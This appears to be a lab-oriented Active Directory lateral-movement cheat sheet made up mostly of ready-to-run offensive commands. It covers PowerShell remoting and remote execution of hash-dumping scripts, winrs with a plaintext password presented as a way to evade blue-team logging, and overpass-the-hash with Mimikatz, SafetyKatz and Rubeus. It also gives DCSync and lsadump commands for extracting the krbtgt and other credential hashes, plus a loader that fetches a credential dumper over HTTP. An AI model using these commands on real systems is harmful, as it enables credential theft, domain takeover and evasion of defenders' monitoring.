LateralMovement
Powershell Remoting
PS Remoting is a feature in windows server just like ssh in linux where administrators can perform tasks on remote machines without having to physically be present at each machine. It uses Windows Remote Management(WinRM) port 5985 http and 5986 https.
Command to enable PSRemoting
Enable-PSRemoting -Force Command to enable PSRemoting on remote machine
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"IF we have administrative access on another machine after use hunting
Enter-PSSession dcorp-adminsrvOR
$session = New-PSSession -ComputerName dcorp-adminsrv
Enter-PSSession -Session $sessionTO execute commands parallely on many machines
If we have privilge to execute commands on many machines use below. Here create a file with names of computers to run commands on.
Invoke-Command -ScriptBlock {Get-Process} -ComputerName (Get-Content <server-lists>)To execute scripts prallely on many machines
Similarly as above create a file with names of computers/servers to run commands on.
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <server-lists>)To evade logging by blue team we can use winrs
winrs -remote:<server-name> -u:server1\administrator -p:Pass@123 hostnameenable rdp access on another computer using scriptblock
Invoke-Command -ScriptBlock {Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
} -ComputerName dcorp-adminsrvOver Pass The Hash
Here, the needed aes256key, rc4 hash all can be got using mimikatz or safetykatz. Here, overpass the hash using any of the below techniques uses logon type 9 which means running whoami still shows as student1 or default username but we can access the remote resource like the domain controller simply by doing winrs -r:dcorp-dc cmd
Using Mimikatz( Needs elevation (Run as administrator))
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:<aes256key> /run:powershell.exe"'Using safetykatz( Needs elevation (Run as administrator))
SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256keys> /run:cmd.exe" "exit"Using BetterSafetyKatz
BetterSafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256keys> /run:cmd.exe" "exit"Using rubeus(doesn't need elevation)
Rubeus.exe asktgt /user:administrator /rc4:<ntlmhash> /pttUsing rubeus(needs elevation)
Rubeus.exe asktgt /user:administrator /aes256:<aes256keys> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /pttDCSync(Needs Domain Admin Privilege by default)
DCSync is a late stage kill chain attack this means an attacker has hold of a user who has Active Directory Domain replication rights, domain replication is the method of updating objects from one DC to another DC and during this process the DC returns replication data to the requester including password hashes.
DCSync to extract krbtgt hash for us domain
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'DCSync to extract krbtgt hash for us domain using safetykatz
SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"DCSync to extract krbtgt hash using bettersafetykatz
BetterSafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"If above does not work use below to get NTLM hash not AES key.
use "lsadump::lsa /patch" "exit" flag
.\Loader.exe -path http://127.0.0.1:8080/BetterSafetyKatz.exe "lsadump::lsa /patch" "exit"BetterSafetyKatz.exe "lsadump::lsa /patch" Invoke-Mimikatz -Command '"lsadump::lsa /patch"'SafetyKatz.exe "lsadump::lsa /patch"Last updated